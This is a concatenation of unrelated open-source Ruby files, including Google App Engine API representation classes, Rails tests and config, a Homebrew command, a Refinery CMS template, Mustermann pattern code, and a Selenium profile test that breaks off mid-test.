class Representation < Google::Apis::Core::JsonRepresentation
property :next_page_token, as: 'nextPageToken'
collection :services, as: 'services', class: Google::Apis::AppengineV1beta::Service, decorator: Google::Apis::AppengineV1beta::Service::Representation
end
end
class ListVersionsResponse
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :next_page_token, as: 'nextPageToken'
collection :versions, as: 'versions', class: Google::Apis::AppengineV1beta::Version, decorator: Google::Apis::AppengineV1beta::Version::Representation
end
end
class LivenessCheck
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :check_interval, as: 'checkInterval'
property :failure_threshold, as: 'failureThreshold'
property :host, as: 'host'
property :initial_delay, as: 'initialDelay'
property :path, as: 'path'
property :success_threshold, as: 'successThreshold'
property :timeout, as: 'timeout'
end
end
class Location
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :display_name, as: 'displayName'
hash :labels, as: 'labels'
property :location_id, as: 'locationId'
hash :metadata, as: 'metadata'
property :name, as: 'name'
end
end
class LocationMetadata
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :flexible_environment_available, as: 'flexibleEnvironmentAvailable'
property :standard_environment_available, as: 'standardEnvironmentAvailable'
end
end
class ManagedCertificate
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :last_renewal_time, as: 'lastRenewalTime'
property :status, as: 'status'
end
end
class ManualScaling
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :instances, as: 'instances'
end
end
class Network
# @private
class Representation < Google::Apis::Core::JsonRepresentation
collection :forwarded_ports, as: 'forwardedPorts'
property :instance_tag, as: 'instanceTag'
property :name, as: 'name'
property :session_affinity, as: 'sessionAffinity'
property :subnetwork_name, as: 'subnetworkName'
end
end
class NetworkUtilization
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :target_received_bytes_per_second, as: 'targetReceivedBytesPerSecond'
property :target_received_packets_per_second, as: 'targetReceivedPacketsPerSecond'
property :target_sent_bytes_per_second, as: 'targetSentBytesPerSecond'
property :target_sent_packets_per_second, as: 'targetSentPacketsPerSecond'
end
end
class OAuth2ClientInfo
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :application_name, as: 'applicationName'
property :client_name, as: 'clientName'
property :developer_email_address, as: 'developerEmailAddress'
end
end
class Operation
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :done, as: 'done'
property :error, as: 'error', class: Google::Apis::AppengineV1beta::Status, decorator: Google::Apis::AppengineV1beta::Status::Representation
hash :metadata, as: 'metadata'
property :name, as: 'name'
hash :response, as: 'response'
end
end
class OperationMetadata
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :end_time, as: 'endTime'
property :insert_time, as: 'insertTime'
property :method_prop, as: 'method'
property :operation_type, as: 'operationType'
property :target, as: 'target'
property :user, as: 'user'
end
end
class OperationMetadataV1
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :create_version_metadata, as: 'createVersionMetadata', class: Google::Apis::AppengineV1beta::CreateVersionMetadataV1, decorator: Google::Apis::AppengineV1beta::CreateVersionMetadataV1::Representation
property :end_time, as: 'endTime'
property :ephemeral_message, as: 'ephemeralMessage'
property :insert_time, as: 'insertTime'
property :method_prop, as: 'method'
property :target, as: 'target'
property :user, as: 'user'
collection :warning, as: 'warning'
end
end
class OperationMetadataV1Alpha
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :create_version_metadata, as: 'createVersionMetadata', class: Google::Apis::AppengineV1beta::CreateVersionMetadataV1Alpha, decorator: Google::Apis::AppengineV1beta::CreateVersionMetadataV1Alpha::Representation
property :end_time, as: 'endTime'
property :ephemeral_message, as: 'ephemeralMessage'
property :insert_time, as: 'insertTime'
property :method_prop, as: 'method'
property :target, as: 'target'
property :user, as: 'user'
collection :warning, as: 'warning'
end
end
class OperationMetadataV1Beta
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :create_version_metadata, as: 'createVersionMetadata', class: Google::Apis::AppengineV1beta::CreateVersionMetadataV1Beta, decorator: Google::Apis::AppengineV1beta::CreateVersionMetadataV1Beta::Representation
property :end_time, as: 'endTime'
property :ephemeral_message, as: 'ephemeralMessage'
property :insert_time, as: 'insertTime'
property :method_prop, as: 'method'
property :target, as: 'target'
property :user, as: 'user'
collection :warning, as: 'warning'
end
end
class OperationMetadataV1Beta5
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :end_time, as: 'endTime'
property :insert_time, as: 'insertTime'
property :method_prop, as: 'method'
property :target, as: 'target'
property :user, as: 'user'
end
end
class ReadinessCheck
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :app_start_timeout, as: 'appStartTimeout'
property :check_interval, as: 'checkInterval'
property :failure_threshold, as: 'failureThreshold'
property :host, as: 'host'
property :path, as: 'path'
property :success_threshold, as: 'successThreshold'
property :timeout, as: 'timeout'
end
end
class RepairApplicationRequest
# @private
class Representation < Google::Apis::Core::JsonRepresentation
end
end
class RequestUtilization
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :target_concurrent_requests, as: 'targetConcurrentRequests'
property :target_request_count_per_second, as: 'targetRequestCountPerSecond'
end
end
class ResourceRecord
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :name, as: 'name'
property :rrdata, as: 'rrdata'
property :type, as: 'type'
end
end
class Resources
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :cpu, as: 'cpu'
property :disk_gb, as: 'diskGb'
property :memory_gb, as: 'memoryGb'
collection :volumes, as: 'volumes', class: Google::Apis::AppengineV1beta::Volume, decorator: Google::Apis::AppengineV1beta::Volume::Representation
end
end
class ScriptHandler
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :script_path, as: 'scriptPath'
end
end
class Service
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :id, as: 'id'
property :name, as: 'name'
property :split, as: 'split', class: Google::Apis::AppengineV1beta::TrafficSplit, decorator: Google::Apis::AppengineV1beta::TrafficSplit::Representation
end
end
class SslSettings
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :certificate_id, as: 'certificateId'
property :pending_managed_certificate_id, as: 'pendingManagedCertificateId'
property :ssl_management_type, as: 'sslManagementType'
end
end
class StandardSchedulerSettings
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :max_instances, as: 'maxInstances'
property :min_instances, as: 'minInstances'
property :target_cpu_utilization, as: 'targetCpuUtilization'
property :target_throughput_utilization, as: 'targetThroughputUtilization'
end
end
class StaticFilesHandler
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :application_readable, as: 'applicationReadable'
property :expiration, as: 'expiration'
hash :http_headers, as: 'httpHeaders'
property :mime_type, as: 'mimeType'
property :path, as: 'path'
property :require_matching_file, as: 'requireMatchingFile'
property :upload_path_regex, as: 'uploadPathRegex'
end
end
class Status
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :code, as: 'code'
collection :details, as: 'details'
property :message, as: 'message'
end
end
class TrafficSplit
# @private
class Representation < Google::Apis::Core::JsonRepresentation
hash :allocations, as: 'allocations'
property :shard_by, as: 'shardBy'
end
end
class UrlDispatchRule
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :domain, as: 'domain'
property :path, as: 'path'
property :service, as: 'service'
end
end
class UrlMap
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :api_endpoint, as: 'apiEndpoint', class: Google::Apis::AppengineV1beta::ApiEndpointHandler, decorator: Google::Apis::AppengineV1beta::ApiEndpointHandler::Representation
property :auth_fail_action, as: 'authFailAction'
property :login, as: 'login'
property :redirect_http_response_code, as: 'redirectHttpResponseCode'
property :script, as: 'script', class: Google::Apis::AppengineV1beta::ScriptHandler, decorator: Google::Apis::AppengineV1beta::ScriptHandler::Representation
property :security_level, as: 'securityLevel'
property :static_files, as: 'staticFiles', class: Google::Apis::AppengineV1beta::StaticFilesHandler, decorator: Google::Apis::AppengineV1beta::StaticFilesHandler::Representation
property :url_regex, as: 'urlRegex'
end
end
class Version
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :api_config, as: 'apiConfig', class: Google::Apis::AppengineV1beta::ApiConfigHandler, decorator: Google::Apis::AppengineV1beta::ApiConfigHandler::Representation
property :automatic_scaling, as: 'automaticScaling', class: Google::Apis::AppengineV1beta::AutomaticScaling, decorator: Google::Apis::AppengineV1beta::AutomaticScaling::Representation
property :basic_scaling, as: 'basicScaling', class: Google::Apis::AppengineV1beta::BasicScaling, decorator: Google::Apis::AppengineV1beta::BasicScaling::Representation
hash :beta_settings, as: 'betaSettings'
property :create_time, as: 'createTime'
property :created_by, as: 'createdBy'
property :default_expiration, as: 'defaultExpiration'
property :deployment, as: 'deployment', class: Google::Apis::AppengineV1beta::Deployment, decorator: Google::Apis::AppengineV1beta::Deployment::Representation
property :disk_usage_bytes, :numeric_string => true, as: 'diskUsageBytes'
property :endpoints_api_service, as: 'endpointsApiService', class: Google::Apis::AppengineV1beta::EndpointsApiService, decorator: Google::Apis::AppengineV1beta::EndpointsApiService::Representation
property :entrypoint, as: 'entrypoint', class: Google::Apis::AppengineV1beta::Entrypoint, decorator: Google::Apis::AppengineV1beta::Entrypoint::Representation
property :env, as: 'env'
hash :env_variables, as: 'envVariables'
collection :error_handlers, as: 'errorHandlers', class: Google::Apis::AppengineV1beta::ErrorHandler, decorator: Google::Apis::AppengineV1beta::ErrorHandler::Representation
collection :handlers, as: 'handlers', class: Google::Apis::AppengineV1beta::UrlMap, decorator: Google::Apis::AppengineV1beta::UrlMap::Representation
property :health_check, as: 'healthCheck', class: Google::Apis::AppengineV1beta::HealthCheck, decorator: Google::Apis::AppengineV1beta::HealthCheck::Representation
property :id, as: 'id'
collection :inbound_services, as: 'inboundServices'
property :instance_class, as: 'instanceClass'
collection :libraries, as: 'libraries', class: Google::Apis::AppengineV1beta::Library, decorator: Google::Apis::AppengineV1beta::Library::Representation
property :liveness_check, as: 'livenessCheck', class: Google::Apis::AppengineV1beta::LivenessCheck, decorator: Google::Apis::AppengineV1beta::LivenessCheck::Representation
property :manual_scaling, as: 'manualScaling', class: Google::Apis::AppengineV1beta::ManualScaling, decorator: Google::Apis::AppengineV1beta::ManualScaling::Representation
property :name, as: 'name'
property :network, as: 'network', class: Google::Apis::AppengineV1beta::Network, decorator: Google::Apis::AppengineV1beta::Network::Representation
property :nobuild_files_regex, as: 'nobuildFilesRegex'
property :readiness_check, as: 'readinessCheck', class: Google::Apis::AppengineV1beta::ReadinessCheck, decorator: Google::Apis::AppengineV1beta::ReadinessCheck::Representation
property :resources, as: 'resources', class: Google::Apis::AppengineV1beta::Resources, decorator: Google::Apis::AppengineV1beta::Resources::Representation
property :runtime, as: 'runtime'
property :runtime_api_version, as: 'runtimeApiVersion'
property :runtime_channel, as: 'runtimeChannel'
property :serving_status, as: 'servingStatus'
property :threadsafe, as: 'threadsafe'
property :version_url, as: 'versionUrl'
property :vm, as: 'vm'
property :vpc_access_connector, as: 'vpcAccessConnector', class: Google::Apis::AppengineV1beta::VpcAccessConnector, decorator: Google::Apis::AppengineV1beta::VpcAccessConnector::Representation
collection :zones, as: 'zones'
end
end
class Volume
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :name, as: 'name'
property :size_gb, as: 'sizeGb'
property :volume_type, as: 'volumeType'
end
end
class VpcAccessConnector
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :name, as: 'name'
end
end
class ZipInfo
# @private
class Representation < Google::Apis::Core::JsonRepresentation
property :files_count, as: 'filesCount'
property :source_url, as: 'sourceUrl'
end
end
end
end
end
| 38.130298 | 230 | 0.649039 |
ff22b5e59c2807270040a0e1b256a1f287eee148
| 406 |
require 'coveralls'
Coveralls.wear!
require 'fakeweb'
require File.expand_path('../../../spec/spec_constants.rb', __FILE__)
require File.expand_path('../../../spec/api_stubs.rb', __FILE__)
ENV['HETZNER_API_CUCUMBER_TEST'] = "1"
# This long timeout is needed for jruby, as each step launches a jruby instance for the cli
#
Before do
@aruba_timeout_seconds = 60
FakeWeb.allow_net_connect = false
end
| 23.882353 | 91 | 0.743842 |
2827e5acbce632f2fc6a014e82e43664a34243b9
| 42 |
SPEC_FILES = "spec/cypress/fixtures/files"
| 42 | 42 | 0.809524 |
e290e027a74503bef94bec360ae17b77912f63f1
| 152 |
class AddAttachmentsDataToApidaeObjects < ActiveRecord::Migration[5.1]
def change
add_column :apidae_objects, :attachments_data, :jsonb
end
end
| 25.333333 | 70 | 0.796053 |
1135fa20853e49856f5254eca8c7af4135c14ce6
| 1,602 |
require 'test_helper'
class FollowingTest < ActionDispatch::IntegrationTest
def setup
@user = users(:tom)
@other = users(:archer)
log_in_as(@user)
end
test "following page" do
get following_user_path(@user)
assert_not @user.following.empty?
assert_match @user.following.count.to_s, response.body
@user.following.each do |user|
assert_select "a[href=?]", user_path(user)
end
end
test "followers page" do
get followers_user_path(@user)
assert_not @user.followers.empty?
assert_match @user.followers.count.to_s, response.body
@user.followers.each do |user|
assert_select "a[href=?]", user_path(user)
end
end
test "should follow a user the standard way" do
assert_difference '@user.following.count', 1 do
post relationships_path, params: { followed_id: @other.id }
end
end
test "should follow a user with Ajax" do
assert_difference '@user.following.count', 1 do
post relationships_path, params: { followed_id: @other.id }
end
end
test "should unfollow a user the standard way" do
@user.follow(@other)
relationship = @user.active_relationships.find_by(followed_id: @other.id)
assert_difference '@user.following.count', -1 do
delete relationship_path(relationship)
end
end
test "should unfollow a user with Ajax" do
@user.follow(@other)
relationship = @user.active_relationships.find_by(followed_id: @other.id)
assert_difference '@user.following.count', -1 do
delete relationship_path(relationship), xhr: true
end
end
end
| 28.105263 | 77 | 0.696005 |
0188f9d7ba420b01a60e31f808a62453c711f822
| 940 |
require "formula"
require "cli/parser"
module Homebrew
module_function
def vendor_gems_args
Homebrew::CLI::Parser.new do
usage_banner <<~EOS
`vendor-gems`
Install and commit Homebrew's vendored gems.
EOS
switch :debug
end
end
def vendor_gems
vendor_gems_args.parse
Homebrew.install_bundler!
ohai "cd #{HOMEBREW_LIBRARY_PATH}"
HOMEBREW_LIBRARY_PATH.cd do
ohai "bundle install --standalone"
safe_system "bundle", "install", "--standalone"
ohai "bundle pristine"
safe_system "bundle", "pristine"
ohai "git add vendor/bundle"
system "git", "add", "vendor/bundle"
if Formula["gpg"].installed?
ENV["PATH"] = PATH.new(ENV["PATH"])
.prepend(Formula["gpg"].opt_bin)
end
ohai "git commit"
system "git", "commit", "--message", "brew vendor-gems: commit updates."
end
end
end
| 21.363636 | 78 | 0.619149 |
61d1c408478e160d9b24bf059b454519983eaf95
| 1,081 |
require_relative 'boot'
require "rails"
# Pick the frameworks you want:
require "active_model/railtie"
require "active_job/railtie"
require "active_record/railtie"
require "action_controller/railtie"
require "action_mailer/railtie"
require "action_view/railtie"
require "action_cable/engine"
require "sprockets/railtie"
# require "rails/test_unit/railtie"
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
module Rkr
class Application < Rails::Application
# Settings in config/environments/* take precedence over those specified here.
# Application configuration should go into files in config/initializers
# -- all .rb files in that directory are automatically loaded.
config.time_zone = 'Berlin'
config.active_job.queue_adapter = :sucker_punch
config.eager_load_paths += Dir[Rails.root.join('app', 'models', '{*/}')]
config.eager_load_paths += Dir[Rails.root.join('app', 'validators')]
config.middleware.insert_before 0, :TagSuggestions
end
end
| 34.870968 | 82 | 0.764107 |
2875718e2c942b7dc78ab35d1eb7a8b9b7c322fc
| 538 |
cask "font-cabin-condensed" do
version :latest
sha256 :no_check
# github.com/google/fonts/ was verified as official when first introduced to the cask
url "https://github.com/google/fonts/trunk/ofl/cabincondensed",
using: :svn,
trust_cert: true
name "Cabin Condensed"
homepage "https://fonts.google.com/specimen/Cabin+Condensed"
depends_on macos: ">= :sierra"
font "CabinCondensed-Bold.ttf"
font "CabinCondensed-Medium.ttf"
font "CabinCondensed-Regular.ttf"
font "CabinCondensed-SemiBold.ttf"
end
| 28.315789 | 87 | 0.728625 |
79da7a186cac476af8506681c66912edcd7a13cc
| 311 |
require "rubygems"
arg = ARGV.first.nil? ? 4 : ARGV.first.to_i
password = []
dictionary = File.expand_path(File.join(__FILE__, "..", "dictionary.txt"))
words = File.readlines(dictionary)
arg.times do
segment = words.shuffle.slice!(0).strip
password.push(segment)
end
puts password.join('')
| 22.214286 | 74 | 0.681672 |
871fdc76599503f32dd3d8093b9272e81a7f91bb
| 2,480 |
# frozen_string_literal: true
module DeviseTokenAuth
class ApplicationController < DeviseTokenAuth.parent_controller.constantize
include DeviseTokenAuth::Concerns::SetUserByToken
def resource_data(opts = {})
response_data = opts[:resource_json] || @resource.as_json
response_data['type'] = @resource.class.name.parameterize if json_api?
response_data
end
def resource_errors
@resource.errors.to_hash.merge(full_messages: @resource.errors.full_messages)
end
protected
def blacklisted_redirect_url?
DeviseTokenAuth.redirect_whitelist && !DeviseTokenAuth::Url.whitelisted?(@redirect_url)
end
def build_redirect_headers(access_token, client, redirect_header_options = {})
{
DeviseTokenAuth.headers_names[:"access-token"] => access_token,
DeviseTokenAuth.headers_names[:"client"] => client,
:config => params[:config],
# Legacy parameters which may be removed in a future release.
# Consider using "client" and "access-token" in client code.
# See: github.com/lynndylanhurley/devise_token_auth/issues/993
:client_id => client,
:token => access_token
}.merge(redirect_header_options)
end
def params_for_resource(resource)
devise_parameter_sanitizer.instance_values['permitted'][resource].each do |type|
params[type.to_s] ||= request.headers[type.to_s] unless request.headers[type.to_s].nil?
end
devise_parameter_sanitizer.instance_values['permitted'][resource]
end
def resource_class(m = nil)
if m
mapping = Devise.mappings[m]
else
mapping = Devise.mappings[resource_name] || Devise.mappings.values.first
end
mapping.to
end
def json_api?
return false unless defined?(ActiveModel::Serializer)
return ActiveModel::Serializer.setup do |config|
config.adapter == :json_api
end if ActiveModel::Serializer.respond_to?(:setup)
ActiveModelSerializers.config.adapter == :json_api
end
def recoverable_enabled?
resource_class.devise_modules.include?(:recoverable)
end
def confirmable_enabled?
resource_class.devise_modules.include?(:confirmable)
end
def render_error(status, message, data = nil)
response = {
success: false,
errors: [message]
}
response = response.merge(data) if data
render json: response, status: status
end
end
end
| 31 | 95 | 0.692742 |
d545036b2cd5d23593049129739785c0fb5d101c
| 4,095 |
# frozen_string_literal: true
module Mustermann
# Class for pattern objects that are a concatenation of other patterns.
# @see Mustermann::Pattern#+
class Concat < Composite
# Mixin for patterns to support native concatenation.
# @!visibility private
module Native
# @see Mustermann::Pattern#+
# @!visibility private
def +(other)
other &&= Mustermann.new(other, type: :identity, **options)
if (patterns = look_ahead(other)) && !patterns.empty?
concat = (self + patterns.inject(:+))
concat + other.patterns.slice(patterns.length..-1).inject(:+)
else
return super unless native = native_concat(other)
self.class.new(native, **options)
end
end
# @!visibility private
def look_ahead(other)
return unless other.is_a?(Concat)
other.patterns.take_while(&method(:native_concat?))
end
# @!visibility private
def native_concat(other)
"#{self}#{other}" if native_concat?(other)
end
# @!visibility private
def native_concat?(other)
other.class == self.class and other.options == options
end
private :native_concat, :native_concat?
end
# Should not be used directly.
# @!visibility private
def initialize(*)
super
AST::Validation.validate(combined_ast) if respond_to? :expand
end
# @see Mustermann::Composite#operator
# @return [Symbol] always :+
def operator
:+
end
# @see Mustermann::Pattern#===
def ===(string)
peek_size(string) == string.size
end
# @see Mustermann::Pattern#match
def match(string)
peeked = peek_match(string)
peeked if peeked.to_s == string
end
# @see Mustermann::Pattern#params
def params(string)
params, size = peek_params(string)
params if size == string.size
end
# @see Mustermann::Pattern#peek_size
def peek_size(string)
pump(string) { |p,s| p.peek_size(s) }
end
# @see Mustermann::Pattern#peek_match
def peek_match(string)
pump(string, initial: SimpleMatch.new) do |pattern, substring|
return unless match = pattern.peek_match(substring)
[match, match.to_s.size]
end
end
# @see Mustermann::Pattern#peek_params
def peek_params(string)
pump(string, inject_with: :merge, with_size: true) { |p, s| p.peek_params(s) }
end
# (see Mustermann::Pattern#expand)
def expand(behavior = nil, values = {})
raise NotImplementedError, 'expanding not supported' unless respond_to? :expand
@expander ||= Mustermann::Expander.new(self) { combined_ast }
@expander.expand(behavior, values)
end
# (see Mustermann::Pattern#to_templates)
def to_templates
raise NotImplementedError, 'template generation not supported' unless respond_to? :to_templates
@to_templates ||= patterns.inject(['']) { |list, pattern| list.product(pattern.to_templates).map(&:join) }.uniq
end
# @!visibility private
def respond_to_special?(method)
method = :to_ast if method.to_sym == :expand
patterns.all? { |p| p.respond_to?(method) }
end
# used to generate results for various methods by scanning through an input string
# @!visibility private
def pump(string, inject_with: :+, initial: nil, with_size: false)
substring = string
results = Array(initial)
patterns.each do |pattern|
result, size = yield(pattern, substring)
return unless result
results << result
size ||= result
substring = substring[size..-1]
end
results = results.inject(inject_with)
with_size ? [results, string.size - substring.size] : results
end
# generates one big AST from all patterns
# will not check if patterns support AST generation
# @!visibility private
def combined_ast
payload = patterns.map { |p| AST::Node[:group].new(p.to_ast.payload) }
AST::Node[:root].new(payload)
end
private :combined_ast, :pump
end
end
| 29.890511 | 117 | 0.640293 |
f8c10d7e9ad38c4008baf4422e3c5ab1f89fe611
| 1,481 |
require 'rbconfig'
VERSION_BAND = '2.1'
MINOR_VERSION_BAND = '2.1.2'
# We want to ensure that you have an ExecJS runtime available!
begin
require 'execjs'
rescue LoadError
abort "ExecJS is not installed. Please re-start the installer after running:\ngem install execjs"
end
if File.read("#{destination_root}/Gemfile") !~ /assets.+coffee-rails/m
gem "coffee-rails", :group => :assets
end
append_file 'Gemfile', <<-GEMFILE
# Refinery CMS
gem 'refinerycms', '~> #{VERSION_BAND}'
# Optionally, specify additional Refinery CMS Extensions here:
gem 'refinerycms-acts-as-indexed', ['~> 1.0', '>= 1.0.0']
gem 'refinerycms-wymeditor', ['~> 1.0', '>= 1.0.6']
# gem 'refinerycms-blog', ['~> #{VERSION_BAND}', '>= #{MINOR_VERSION_BAND}']
# gem 'refinerycms-inquiries', ['~> #{VERSION_BAND}', '>= #{MINOR_VERSION_BAND}']
# gem 'refinerycms-search', ['~> #{VERSION_BAND}', '>= #{MINOR_VERSION_BAND}']
# gem 'refinerycms-page-images', ['~> #{VERSION_BAND}', '>= #{MINOR_VERSION_BAND}']
GEMFILE
begin
require 'execjs'
::ExecJS::Runtimes.autodetect
rescue
gsub_file 'Gemfile', "# gem 'therubyracer'", "gem 'therubyracer'"
end
run 'bundle install'
rake 'db:create'
generate "refinery:cms --fresh-installation #{ARGV.join(' ')}"
say <<-SAY
============================================================================
Your new Refinery CMS application is now installed and mounts at '/'
============================================================================
SAY
| 31.510638 | 99 | 0.615125 |
d53cf8c44611f9ae7e74003acb6ab7b3e82f72ab
| 2,731 |
require 'rails_helper'
describe ActionCableListener do
let(:listener) { described_class.instance }
let!(:account) { create(:account) }
let!(:admin) { create(:user, account: account, role: :administrator) }
let!(:inbox) { create(:inbox, account: account) }
let!(:agent) { create(:user, account: account, role: :agent) }
let!(:conversation) { create(:conversation, account: account, inbox: inbox, assignee: agent) }
before do
create(:inbox_member, inbox: inbox, user: agent)
end
describe '#message_created' do
let(:event_name) { :'message.created' }
let!(:message) do
create(:message, message_type: 'outgoing',
account: account, inbox: inbox, conversation: conversation)
end
let!(:event) { Events::Base.new(event_name, Time.zone.now, message: message) }
it 'sends message to account admins, inbox agents and the contact' do
# HACK: to reload conversation inbox members
expect(conversation.inbox.reload.inbox_members.count).to eq(1)
expect(ActionCableBroadcastJob).to receive(:perform_later).with(
[agent.pubsub_token, admin.pubsub_token, conversation.contact.pubsub_token], 'message.created', message.push_event_data
)
listener.message_created(event)
end
end
describe '#typing_on' do
let(:event_name) { :'conversation.typing_on' }
let!(:event) { Events::Base.new(event_name, Time.zone.now, conversation: conversation, user: agent) }
it 'sends message to account admins, inbox agents and the contact' do
# HACK: to reload conversation inbox members
expect(conversation.inbox.reload.inbox_members.count).to eq(1)
expect(ActionCableBroadcastJob).to receive(:perform_later).with(
[admin.pubsub_token, conversation.contact.pubsub_token],
'conversation.typing_on', conversation: conversation.push_event_data,
user: agent.push_event_data
)
listener.conversation_typing_on(event)
end
end
describe '#typing_off' do
let(:event_name) { :'conversation.typing_off' }
let!(:event) { Events::Base.new(event_name, Time.zone.now, conversation: conversation, user: agent) }
it 'sends message to account admins, inbox agents and the contact' do
# HACK: to reload conversation inbox members
expect(conversation.inbox.reload.inbox_members.count).to eq(1)
expect(ActionCableBroadcastJob).to receive(:perform_later).with(
[admin.pubsub_token, conversation.contact.pubsub_token],
'conversation.typing_off', conversation: conversation.push_event_data,
user: agent.push_event_data
)
listener.conversation_typing_off(event)
end
end
end
| 42.015385 | 127 | 0.691322 |
acb6e5813808cc439daa0639260178cb4407b93b
| 814 |
# coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'draw_kingdom/version'
Gem::Specification.new do |spec|
spec.name = "draw_kingdom"
spec.version = DrawKingdom::VERSION
spec.authors = ["Asaf Shveki"]
spec.email = ["[email protected]"]
spec.summary = ["Summary"]
spec.description = ["ssss"]
spec.homepage = ""
spec.license = "MIT"
spec.files = `git ls-files -z`.split("\x0")
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ["lib"]
spec.add_development_dependency "bundler", "~> 1.7"
spec.add_development_dependency "rake", "~> 10.0"
end
| 33.916667 | 74 | 0.630221 |
872fcf5fa0fc5eda9cfb8604a33f653b68429660
| 18,361 |
describe 'My Profile Contact Info', :testui => true, :order => :defined do
if ENV['UI_TEST'] && Settings.ui_selenium.layer == 'local'
include ClassLogger
# Load a test data file. See sample in the ui_selenium fixtures dir.
test_users = UserUtils.load_profile_test_data
student = test_users.first
contact_info = student['contactInfo']
addresses = contact_info['addresses']
before(:all) do
@driver = WebDriverUtils.launch_browser
@splash_page = CalCentralPages::SplashPage.new @driver
@cal_net_page = CalNetAuthPage.new @driver
@my_dashboard = CalCentralPages::MyDashboardPage.new @driver
@contact_info_card = CalCentralPages::MyProfileContactInfoCard.new @driver
@splash_page.log_into_dashboard(@driver, @cal_net_page, student['username'], student['password'])
@my_dashboard.click_profile_link @driver
@contact_info_card.click_contact_info
@contact_info_card.wait_until(WebDriverUtils.page_load_timeout) do
@contact_info_card.phone_label_element.visible?
@contact_info_card.email_label_element.visible?
@contact_info_card.address_label_element.visible?
end
end
after(:all) do
WebDriverUtils.quit_browser(@driver)
end
describe 'phone number' do
before(:all) do
# Get rid of any existing phone data
@contact_info_card.delete_all_phones
@possible_phone_types = %w(Local Mobile Home/Permanent)
@phones = contact_info['phones']
end
describe 'adding' do
before(:all) do
@mobile_phone = @phones.find { |phone| phone['type'] == 'Mobile' && phone['test'] == 'adding' }
@home_phone = @phones.find { |phone| phone['type'] == 'Home/Permanent' && phone['test'] == 'adding' }
@local_phone = @phones.find { |phone| phone['type'] == 'Local' && phone['test'] == 'adding' }
end
it 'requires that a phone number be entered' do
@contact_info_card.click_add_phone
@contact_info_card.save_phone_button_element.when_visible WebDriverUtils.page_event_timeout
expect(@contact_info_card.save_phone_button_element.attribute('disabled')).to eql('true')
@contact_info_card.click_cancel_phone
end
it 'allows a user to add a new phone' do
@contact_info_card.add_new_phone @home_phone
@contact_info_card.verify_phone(@home_phone, true)
end
it 'prevents a user adding a phone of the same type as an existing one' do
@contact_info_card.click_add_phone
expect(@contact_info_card.phone_type_options).not_to include('Home/Permanent')
end
it 'allows a user to save a new non-preferred phone' do
@contact_info_card.add_new_phone @mobile_phone
@contact_info_card.verify_phone @mobile_phone
end
it 'allows a maximum number of characters to be entered in each field' do
@contact_info_card.add_new_phone @local_phone
@contact_info_card.verify_phone @local_phone
end
end
describe 'editing' do
before(:all) do
@mobile_phone = @phones.find { |phone| phone['type'] == 'Mobile' && phone['test'] == 'editing' }
@home_phone = @phones.find { |phone| phone['type'] == 'Home/Permanent' && phone['test'] == 'editing' }
@local_phone = @phones.find { |phone| phone['type'] == 'Local' && phone['test'] == 'editing' }
@mobile_index = @contact_info_card.phone_type_index 'Mobile'
@home_index = @contact_info_card.phone_type_index 'Home/Permanent'
@local_index = @contact_info_card.phone_type_index 'Local'
end
it 'allows a user to change the phone number and extension' do
@contact_info_card.edit_phone(@mobile_index, @mobile_phone)
@contact_info_card.verify_phone @mobile_phone
end
it 'allows a user to choose a different preferred phone' do
@contact_info_card.edit_phone(@mobile_index, @mobile_phone, true)
@contact_info_card.wait_until(WebDriverUtils.page_load_timeout) { @contact_info_card.phone_primary? @mobile_index }
expect(@contact_info_card.phone_primary? @home_index).to be false
end
it 'prevents a user de-preferring a phone if more than two phones exist' do
@contact_info_card.edit_phone(@mobile_index, @mobile_phone)
@contact_info_card.phone_validation_error_element.when_visible(WebDriverUtils.page_load_timeout)
expect(@contact_info_card.phone_validation_error).to eql('One phone number must be checked as preferred')
end
it 'does not allow a user to change the phone type' do
@contact_info_card.click_edit_phone @mobile_index
@contact_info_card.add_phone_form_element.when_visible(WebDriverUtils.page_event_timeout)
expect(@contact_info_card.phone_type?).to be false
end
it 'requires that a phone number be entered' do
@contact_info_card.click_edit_phone @mobile_index
@contact_info_card.enter_phone(nil, '', nil, nil)
expect(@contact_info_card.save_phone_button_element.attribute('disabled')).to eql('true')
end
it 'does not require that a phone extension be entered' do
@contact_info_card.click_edit_phone @mobile_index
@contact_info_card.enter_phone(nil, '1234567890', nil, nil)
expect(@contact_info_card.save_phone_button_element.attribute('disabled')).to be_nil
end
it 'requires that a valid phone extension be entered' do
@contact_info_card.edit_phone(@home_index, @home_phone)
@contact_info_card.phone_validation_error_element.when_visible(WebDriverUtils.page_load_timeout)
expect(@contact_info_card.phone_validation_error).to eql('Invalid Phone Extension number: ?')
end
it 'allows a maximum number of characters to be entered in each field' do
@contact_info_card.edit_phone(@local_index, @local_phone)
